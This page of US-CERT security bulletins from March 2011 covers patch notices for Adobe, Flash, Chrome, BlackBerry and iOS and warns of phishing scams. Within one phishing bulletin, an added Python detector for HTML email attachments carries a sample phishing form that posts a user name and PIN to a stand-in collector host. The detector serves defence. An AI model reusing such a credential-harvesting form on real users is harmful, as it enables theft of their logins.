Forbidden Web

Mar 22, 2011 Adobe Releases Security Updates for Reader and Acrobat
Adobe has released updates for Adobe Reader and Acrobat for Windows and Macintosh. These updates address a vulnerability in the authplay.dll component. Exploitation of this vulnerability may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review Adobe security bulletin APSB11-06 and apply any necessary updates to help mitigate the risks.
Mar 21, 2011 Adobe Releases Flash Player Update
Adobe has released an update for Flash Player to address multiple vulnerabilities. These vulnerabilities affect Adobe Flash Player 10.1.102.64 and earlier versions for Windows, Macintosh, Linux, and Solaris, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. Exploitation of these vulnerabilities may allow an attacker to cause a denial-of-service attack or execute arbitrary code.

US-CERT encourages users and administrators to review Adobe Security Advisory APSB11-02 and apply any necessary updates to help mitigate the risks.
Mar 18, 2011 Ongoing Phishing Attack
US-CERT is aware of public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment.

This attack is unlike common phishing attacks because it stores the malicious webpage locally rather than directing the user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks, but this method of attack is able to bypass that security mechanism.
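
A mail-gateway style check for the delivery method described above, as an added example that is not part of the US-CERT text: it flags HTML files attached to a message and, as an assumption beyond the bulletin, reports form actions that point at remote hosts and the presence of password fields. The sample message, its addresses and the function name `html_attachment_findings` are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
# Constructed sample (not a real message): an HTML page sent as an attachment.
SAMPLE = """\
From: service@bank.example
Subject: Account verification required
Content-Type: multipart/mixed; boundary="XX"

--XX
Content-Type: text/plain

Please open the attached form to restore access.
--XX
Content-Type: text/html; name="verify.html"
Content-Disposition: attachment; filename="verify.html"

<html><body><form method="post" action="http://collector.example/save">
<input name="user"><input type="password" name="pin"></form></body></html>
--XX--
"""

class FormFinder(HTMLParser):
    """Collects form actions and notes password inputs (assumed indicators)."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True

def html_attachment_findings(raw):
    """Return one finding per HTML file attached to the message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        is_html = part.get_content_type() == "text/html" or name.endswith((".htm", ".html"))
        if not is_html or not (name or part.get_content_disposition() == "attachment"):
            continue  # inline HTML body, not a file opened from disk
        body = part.get_payload(decode=True).decode("utf-8", "replace")
        finder = FormFinder()
        finder.feed(body)
        remote = [u for u in finder.actions if u.lower().startswith(("http://", "https://"))]
        findings.append({"filename": name, "remote_form_actions": remote,
                         "password_field": finder.has_password})
    return findings
```

A message whose HTML is only the inline body produces no finding; only HTML delivered as a named or attached file is reported.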

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing attacks:
Mar 17, 2011 Google Releases Chrome 10.0.648.134
Google has released Chrome 10.0.648.134 for Windows, Mac, Linux, and Chrome Frame. This release contains an updated version of the Adobe Flash player that addresses a vulnerability. Exploitation of this vulnerability may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and apply any necessary updates to help mitigate the risks.
Mar 16, 2011 US Tax Season Phishing Scams and Malware Campaigns
In the past, US-CERT has received reports of an increased number of phishing scams and malware campaigns that take advantage of the United States tax season. Due to the upcoming tax deadline, US-CERT reminds users to remain cautious when receiving unsolicited email that could be part of a potential phishing scam or malware campaign.

These phishing scams and malware campaigns may include, but are not limited to, the following:
  • information that refers to a tax refund
  • warnings about unreported or under-reported income
  • offers to assist in filing for a refund
  • details about fake e-file websites
These messages, which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code.

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing scams and malware campaigns:
Mar 16, 2011 BlackBerry WebKit Browser Engine Vulnerability
Research In Motion has released a security notice to alert users of a vulnerability affecting the WebKit browser engine provided in BlackBerry Device Software versions 6.0 and later. By convincing a user to browse to a specially crafted website, a remote attacker may be able to execute arbitrary code. Exploitation of this vulnerability may allow an attacker to access user data stored on the media card and the built-in media storage on the affected BlackBerry device.

US-CERT encourages users and administrators to review BlackBerry security notice KB26132 and do the following to help mitigate the risks:
  • Exercise caution when accessing untrusted websites in browsers, email messages, or instant messages.
  • Disable the use of JavaScript in the BlackBerry Browser or disable the BlackBerry Browser as suggested in BlackBerry security notice KB26132.
Additional information regarding this vulnerability can be found in US Department of Energy Cyber Incident Response Capability (DOE-CIRC) technical bulletin T-579. US-CERT will provide additional information as it becomes available.
Mar 15, 2011 Adobe Releases Security Advisory for Flash Player, Reader, and Acrobat
Adobe has released a security advisory to alert users of a vulnerability affecting the following products:
  • Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux, and Solaris
  • Adobe Flash Player 10.2.154.18 and earlier versions for Google Chrome users
  • Adobe Flash Player 10.1.106.16 and earlier versions for Android
  • The Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.1) and earlier 10.x and 9.x versions for Windows and Macintosh.
Exploitation of this vulnerability may allow an attacker to execute arbitrary code or cause a denial-of-service condition. At this time, the vendor has not released a fix for this vulnerability. The Adobe advisory indicates that this vulnerability is being actively exploited via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment.

Adobe has indicated that it expects to release a fix for this vulnerability during the week of March 21, 2011. In the interim, users and administrators are encouraged to implement the following workarounds to help reduce the risks.
  • Disable Flash in the web browser as described in the Securing Your Web Browser document.
  • Disable Flash and 3D & Multimedia support in Adobe Reader 9 and later.
  • Disable JavaScript in Adobe Reader and Acrobat.
  • Prevent Internet Explorer from automatically opening PDF documents.
  • Disable the displaying of PDF documents in the web browser.
  • Enable DEP in Microsoft Windows.
  • Utilize Microsoft EMET to enable runtime mitigations for Microsoft Internet Explorer and Excel.
Additional information regarding this vulnerability, including detailed workaround instructions, can be found in US-CERT Vulnerability Note VU#192052. US-CERT will provide additional information as it becomes available.
Mar 14, 2011 Google Releases Chrome 10.0.648.133
Google has released Chrome 10.0.648.133 for Windows, Mac, Linux, and Chrome Frame. This update addresses a vulnerability that may allow an attacker to execute arbitrary code.

US-CERT encourages users and administrators to review the Google Chrome Releases blog entry and apply any necessary updates to help mitigate the risks.
Mar 11, 2011 Japan Earthquake and Tsunami Disaster Email Scams, Fake Antivirus and Phishing Attack Warning
US-CERT would like to warn users of potential email scams, fake antivirus and phishing attacks regarding the Japan earthquake and the tsunami disasters. Email scams may contain links or attachments which may direct users to phishing or malware-laden websites. Fake antivirus attacks may come in the form of pop-ups which flash security warnings and ask the user for credit card information. Phishing emails and websites requesting donations for bogus charitable organizations commonly appear after these types of natural disasters.

US-CERT encourages users to take the following measures to protect themselves:

  • Do not follow unsolicited web links or attachments in email messages.
  • Maintain up-to-date antivirus software.
  • Review the Recognizing Fake Antivirus document for additional information on recognizing fake antivirus.
  • Refer to the Avoiding Social Engineering and Phishing Attacks document for additional information on social engineering attacks.
  • Refer to the Recognizing and Avoiding Email Scams (pdf) document for additional information on avoiding email scams.
  • Review the Federal Trade Commission's Charity Checklist.
  • Verify the legitimacy of the email by contacting the organization directly through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.

US-CERT will provide additional information as it becomes available.
Mar 10, 2011 Apple Releases iOS 4.3
Apple has released iOS 4.3 for the iPhone 3GS and later, iPod touch (3rd generation) and later, and iPad to address multiple vulnerabilities. These vulnerabilities affect the CoreGraphics, ImageIO, libxml, Networking, Safari, and WebKit packages. Exploitation of these vulnerabilities may allow an attacker to execute arbitrary code or cause a denial-of-service condition.

US-CERT encourages users and administrators to review Apple article HT4564 and apply any necessary updates to help mitigate the risks.